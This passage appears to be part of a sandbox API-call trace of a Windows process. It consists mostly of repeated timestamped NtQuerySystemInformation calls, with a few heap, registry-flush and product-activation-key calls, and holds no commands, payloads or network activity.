NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedc0, Length=0x38, ResultLength=0x0) [0222.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedc0, Length=0x38, ResultLength=0x0) [0222.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecf0, Length=0x28, ResultLength=0x0) [0222.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecf0, Length=0x28, ResultLength=0x0) [0222.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedc0, Length=0x38, ResultLength=0x0) [0222.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedc0, Length=0x38, ResultLength=0x0) [0222.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feb60, Length=0x20, ResultLength=0x0) [0222.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feae0, Length=0x20, ResultLength=0x0) [0222.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feae0, Length=0x20, ResultLength=0x0) [0222.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feae0, Length=0x20, ResultLength=0x0) [0222.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed30, Length=0x20, ResultLength=0x0) [0222.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedc0, Length=0x38, ResultLength=0x0) [0222.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec50, Length=0x20, ResultLength=0x0) [0222.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69febd0, Length=0x20, ResultLength=0x0) [0222.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69febd0, Length=0x20, ResultLength=0x0) [0222.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69febd0, Length=0x20, ResultLength=0x0) [0222.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedc0, Length=0x38, ResultLength=0x0) [0222.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec50, Length=0x20, ResultLength=0x0) [0222.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69febd0, Length=0x20, ResultLength=0x0) [0222.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69febd0, Length=0x20, ResultLength=0x0) [0222.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69febd0, Length=0x20, ResultLength=0x0) [0222.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedc0, Length=0x38, ResultLength=0x0) [0222.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec50, Length=0x20, ResultLength=0x0) [0222.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69febe0, Length=0x20, ResultLength=0x0) [0222.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69febe0, Length=0x20, ResultLength=0x0) [0222.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff160, Length=0x20, ResultLength=0x0) [0222.446] GetTickCount () returned 0x11780ea [0222.446] GetProcessHeap () returned 0x27fc8db0000 [0222.446] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e430d0 [0222.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef10, Length=0x30, ResultLength=0x0) [0222.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee10, Length=0x38, ResultLength=0x0) [0222.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee10, Length=0x38, ResultLength=0x0) [0222.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee10, Length=0x38, ResultLength=0x0) [0222.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed90, Length=0x30, ResultLength=0x0) [0222.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed00, Length=0x38, ResultLength=0x0) [0222.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec60, Length=0x30, ResultLength=0x0) [0222.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee10, Length=0x38, ResultLength=0x0) [0222.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee10, Length=0x38, ResultLength=0x0) [0222.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed50, Length=0x30, ResultLength=0x0) [0222.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecb0, Length=0x20, ResultLength=0x0) [0222.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed50, Length=0x30, ResultLength=0x0) [0222.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec90, Length=0x30, ResultLength=0x0) [0222.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0222.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee10, Length=0x38, ResultLength=0x0) [0223.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.116] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed40, Length=0x30, ResultLength=0x0) [0223.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec00, Length=0x18, ResultLength=0x0) [0223.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.519] RegFlushKey (hKey=0x330) returned 0x0 [0223.526] NtLockProductActivationKeys (pPrivateVer=0x0, pSafeMode=0x0) returned 0x0 [0223.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee10, Length=0x38, ResultLength=0x0) [0223.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee10, Length=0x38, ResultLength=0x0) [0223.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee10, Length=0x38, ResultLength=0x0) [0223.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed50, Length=0x30, ResultLength=0x0) [0223.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecb0, Length=0x20, ResultLength=0x0) [0223.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed50, Length=0x30, ResultLength=0x0) [0223.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec90, Length=0x30, ResultLength=0x0) [0223.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff080, Length=0x28, ResultLength=0x0) [0223.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69ff080, Length=0x28, ResultLength=0x0) [0223.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fef60, Length=0x58, ResultLength=0x0) [0223.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee50, Length=0x38, ResultLength=0x0) [0223.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec90, Length=0x28, ResultLength=0x0) [0223.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec90, Length=0x28, ResultLength=0x0) [0223.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec90, Length=0x28, ResultLength=0x0) [0223.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec90, Length=0x28, ResultLength=0x0) [0223.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed00, Length=0x28, ResultLength=0x0) [0223.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee50, Length=0x38, ResultLength=0x0) [0223.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee50, Length=0x38, ResultLength=0x0) [0223.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed80, Length=0x28, ResultLength=0x0) [0223.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed80, Length=0x28, ResultLength=0x0) [0223.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee50, Length=0x38, ResultLength=0x0) [0223.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee50, Length=0x38, ResultLength=0x0) [0223.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69febf0, Length=0x20, ResultLength=0x0) [0223.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feb70, Length=0x20, ResultLength=0x0) [0223.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feb70, Length=0x20, ResultLength=0x0) [0223.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feb70, Length=0x20, ResultLength=0x0) [0223.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedc0, Length=0x20, ResultLength=0x0) [0223.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee50, Length=0x38, ResultLength=0x0) [0223.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fece0, Length=0x20, ResultLength=0x0) [0223.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec60, Length=0x20, ResultLength=0x0) [0223.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec60, Length=0x20, ResultLength=0x0) [0223.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec60, Length=0x20, ResultLength=0x0) [0223.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0223.555] NtQuerySystemInformation 